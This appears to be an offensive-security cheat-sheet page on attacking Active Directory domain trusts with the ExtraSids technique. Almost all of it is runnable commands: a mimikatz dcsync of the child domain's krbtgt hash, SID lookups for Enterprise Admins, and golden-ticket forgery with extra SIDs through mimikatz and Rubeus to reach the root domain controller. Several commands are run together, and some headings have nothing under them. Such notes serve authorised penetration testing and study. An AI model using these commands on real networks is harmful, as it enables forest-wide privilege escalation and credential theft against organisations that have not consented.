Attacking Domain Trusts
ExtraSids
Locally - Windows
lsadump::dcsync /user:<CHILD_DOMAIN>\krbtgt
# take note of Domain SID (Security ID - Relative ID)Get-DomainSIDGet-DomainGroup -Domain <DOMAIN> -Identity "Enterprise Admins" | select distinguishedname,objectsidGet-ADGroup -Identity "Enterprise Admins" -Server "<DOMAIN>"mimikatz.exe
> kerberos::golden /user:<NEW_USER> /domain:<FQDN_CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /krbtgt:<HASH> /sids:<ENTERPRISE_ADMIN_SID> /pttklist
ls \\<MACHINE_DC>.<DOMAIN_ROOT>\c$.\Rubeus.exe golden /rc4:<HASH> /domain:<FQDN_CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /sids:<ENTERPRISE_ADMIN_SID> /user:<NEW_USER> /pttklist
ls \\<MACHINE_DC>.<DOMAIN_ROOT>\c$Remotely - Linux
Foreign Group Membership
Kerberoasting
Last updated